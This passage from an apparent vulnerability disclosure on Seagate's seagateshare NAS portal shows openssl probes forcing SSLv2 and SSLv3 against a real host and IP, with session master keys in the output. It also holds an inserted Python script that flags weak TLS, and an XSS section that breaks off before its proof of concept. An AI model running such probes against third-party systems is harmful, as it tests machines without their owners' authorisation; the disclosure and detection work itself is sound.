<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> GET / HTTP/1.1</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> Host: 81.107.113.155</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> User-Agent: curl/7.54.0</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> Accept: */*</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> </span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* HTTP 1.0, assume close after body</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< HTTP/1.0 302 Found</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Date: Mon, 08 Jan 2018 19:02:23 GMT</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Server: Apache/2.2.3 (Red Hat)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-Powered-By: PHP/5.1.6</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-PHP-PID: 1541</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Set-Cookie: HOMEBASEID=472aad2b9377d2ee3fae12b78262bf51; </span><br />
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">expires=Tuesday, 09-Jan-18 19:02:23 GMT; path=/</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Expires: Mon, 08 Jan 2018 22:02:23 GMT</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Cache-Control: public, max-age=10800</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Last-Modified: Fri, 30 Sep 2011 21:03:07 GMT</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Set-Cookie: HOMEBASEID=472aad2b9377d2ee3fae12b78262bf51; </span><br />
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Language: en-US</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Window-target: _top</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Location: https://www.seagateshare.com/?hipname=earth1961</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-Axentra-Version: 10.2.0</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Length: 0</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Connection: close</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Type: text/html; charset=UTF-8</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">$ openssl s_client -connect seagateshare.com:443 -ssl3</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CONNECTED(00000003)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">---</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">No client certificate CA names sent</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">---</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SSL handshake has read 3352 bytes and written 308 bytes</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">---</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Server public key is 2048 bit</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Secure Renegotiation IS supported</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Compression: NONE</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Expansion: NONE</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SSL-Session:</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Protocol : SSLv3</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Cipher : DHE-RSA-AES256-SHA</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Session-ID: 726202AD9F5B5658518B30567129E66B4DC98B54BEAEA009A29E673058584CFC</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Session-ID-ctx: </span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Master-Key: </span><span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">16419B269EC97CE6A1D2062087C996FC46FD5BB4C3C93126D8263913782BBFF8</span><br />
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">C1112EFB41B1F</span><span style="background-color: transparent; font-family: "cambria"; font-size: 9pt; white-space: pre;">066F2D8F26AB3EEEEE5</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Key-Arg : None</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Start Time: 1515437896</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Timeout : 7200 (sec)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Verify return code: 0 (ok)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">$</span><span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> openssl s_client -connect 81.107.113.155:443 -ssl2</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CONNECTED(00000003)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ciphers common between both SSL endpoints:</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RC4-MD5 EXP-RC4-MD5 RC2-CBC-MD5 </span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">EXP-RC2-CBC-MD5 DES-CBC-MD5 DES-CBC3-MD5</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">---</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SSL handshake has read 832 bytes and written 236 bytes</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">---</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">New, SSLv2, Cipher is DES-CBC3-MD5</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Server public key is 1024 bit</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Secure Renegotiation IS NOT supported</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Compression: NONE</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Expansion: NONE</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SSL-Session:</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Protocol : SSLv2</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Cipher : DES-CBC3-MD5</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Session-ID: 0149D7AE92D54EDD24E5F2DBDE5B4DE2</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Session-ID-ctx: </span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Master-Key: 4B3916B4CC9F7556FFAC3E4F61C2D20D65C2C77AF37577EF</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Key-Arg : 43E615F0819EF446</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Start Time: 1515438170</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Timeout : 300 (sec)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Verify return code: 18 (self signed certificate)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
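<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
The transcripts above are easy to eyeball once, but a scan across many devices needs the same checks applied mechanically. The following is an added example (not code from the original post or from Seagate): it parses the text that openssl s_client and curl -v print and flags a deprecated protocol version, a weak cipher suite, a server key below 2048 bits, missing secure renegotiation, a certificate that did not verify, and the curl case where the handshake only succeeded because --insecure turned certificate checks off. The embedded transcripts are constructed for the example; their values are invented and only mimic the shape of the output shown above, and the 2048-bit threshold is this example's own choice.
</div>

```python
"""Triage TLS handshake transcripts for the weaknesses discussed above.

Added example, not code from the original post or from Seagate. Parses what
`openssl s_client` and `curl -v` print; the transcripts at the bottom are
constructed (invented values mimicking the shape of the output above).
"""
import re

# Protocol versions a server should no longer accept.
DEPRECATED_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1", "TLS 1.0", "TLSv1.1", "TLS 1.1"}
# Export-grade, RC4/RC2, single or triple DES, MD5-MAC and NULL suites; matches
# OpenSSL names (DES-CBC3-MD5) as well as IANA names (TLS_RSA_WITH_RC4_128_MD5).
WEAK_CIPHER_RE = re.compile(r"EXP|RC4|RC2|DES|MD5|NULL")
MIN_KEY_BITS = 2048  # threshold chosen for this example


def negotiated_protocol(text):
    """Protocol version reported by the transcript, or None."""
    # openssl s_client prints "    Protocol  : SSLv3" in its SSL-Session block.
    m = re.search(r"^\s*Protocol\s*:\s*(\S+)", text, re.M)
    if m:
        return m.group(1)
    # curl -v prints "* TLS 1.0 connection using <suite>" instead.
    m = re.search(r"^\* (TLS \d\.\d|SSLv\d) connection using", text, re.M)
    return m.group(1) if m else None


def negotiated_cipher(text):
    """Cipher suite reported by the transcript, or None."""
    m = re.search(r"^\s*Cipher\s*:\s*(\S+)", text, re.M)
    if m:
        return m.group(1)
    m = re.search(r"connection using (\S+)", text)
    return m.group(1) if m else None


def findings_for_transcript(text):
    """Return human-readable findings for one handshake transcript."""
    findings = []
    proto = negotiated_protocol(text)
    if proto in DEPRECATED_PROTOCOLS:
        findings.append(f"deprecated protocol negotiated: {proto}")
    cipher = negotiated_cipher(text)
    if cipher and WEAK_CIPHER_RE.search(cipher):
        findings.append(f"weak cipher suite negotiated: {cipher}")
    m = re.search(r"Server public key is (\d+) bit", text)
    if m and int(m.group(1)) < MIN_KEY_BITS:
        findings.append(f"server key only {m.group(1)} bits (below {MIN_KEY_BITS})")
    if "Secure Renegotiation IS NOT supported" in text:
        findings.append("secure renegotiation not supported")
    m = re.search(r"Verify return code: (\d+) \(([^)]*)\)", text)
    if m and m.group(1) != "0":
        findings.append(f"certificate did not verify: {m.group(2)}")
    if "disabling hostname validation" in text:
        # curl --insecure: the handshake only succeeded because checks were off.
        findings.append("client ran with certificate checks disabled")
    return findings


# Constructed transcripts: shaped like the output above, values invented.
SAMPLE_SSLV2 = """\
Ciphers common between both SSL endpoints:
RC4-MD5 EXP-RC4-MD5 RC2-CBC-MD5 EXP-RC2-CBC-MD5 DES-CBC-MD5 DES-CBC3-MD5
New, SSLv2, Cipher is DES-CBC3-MD5
Server public key is 1024 bit
Secure Renegotiation IS NOT supported
SSL-Session:
    Protocol  : SSLv2
    Cipher    : DES-CBC3-MD5
    Verify return code: 18 (self signed certificate)
"""
SAMPLE_SSLV3 = """\
Server public key is 2048 bit
Secure Renegotiation IS supported
SSL-Session:
    Protocol  : SSLv3
    Cipher    : DHE-RSA-AES256-SHA
    Verify return code: 0 (ok)
"""
SAMPLE_CURL = """\
* Connected to 192.0.2.10 (192.0.2.10) port 443 (#0)
* WARNING: disabling hostname validation also disables SNI.
* TLS 1.0 connection using TLS_DHE_RSA_WITH_AES_256_CBC_SHA
* Server certificate: localdomain
"""
SAMPLE_MODERN = """\
Server public key is 2048 bit
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES128-GCM-SHA256
    Verify return code: 0 (ok)
"""

if __name__ == "__main__":
    for name, text in [("sslv2", SAMPLE_SSLV2), ("sslv3", SAMPLE_SSLV3),
                       ("curl", SAMPLE_CURL), ("modern", SAMPLE_MODERN)]:
        print(name, findings_for_transcript(text) or ["no findings"])
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Two design points: the cipher pattern deliberately also catches 3DES suites such as DES-CBC3-MD5, since a server still offering them belongs on the same remediation list as the SSLv2/SSLv3 one; and a curl run with --insecure is reported as a finding about the client, because a successful handshake under that flag says nothing about whether the certificate would have been trusted.
</div>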
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Vulnerability 2:</span><span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"> Cross-site Scripting in SaaS Web App : Seagateshare</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The web-based portal is vulnerable to Cross-site Scripting (XSS) attack by exploiting a </span><br />
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">content-injection </span><span style="font-family: "cambria"; font-size: 11pt; white-space: pre;">vulnerability. The issue persists due to inability of the web app to perform </span><br />
<span style="font-family: "cambria"; font-size: 11pt; white-space: pre;">input validation for the arbitrary </span><span style="color: black; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">values passed to the specific HTTP parameters. </span><span style="background-color: white; color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">This results </span><br />
<span style="background-color: white; color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">in execution of XSS payloads that could be </span><span style="background-color: white; color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">exploited to perform multiple variations of web attacks </span><br />
<span style="background-color: white; color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">such as cookie stealing, etc. A successful </span><span style="background-color: white; color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">Proof-of-Concept (PoC) of the issue is presented below:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
